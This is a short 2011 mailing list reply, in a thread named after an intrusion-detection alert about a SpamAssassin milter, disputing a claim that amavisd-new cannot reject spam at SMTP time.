Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
On Fri, 2011-02-11 at 12:08:35 -0800, Adam Katz wrote:

> I consider it a mission-critical component to be able to deliver a
> rejection notice at SMTP-time (to avoid backscatter from an emailed
> bounce message). The other systems out there (specifically amavis and
> mailscanner) just can't do this while spamass-milter does it with very
> little overhead or configuration.

For posterity, and to hopefully prevent the spread of misinformation via
list archives, the above (specifically with regard to amavisd-new) is
patently false.

--
Sahil Tandon <sahil@FreeBSD.org>

1 2  View All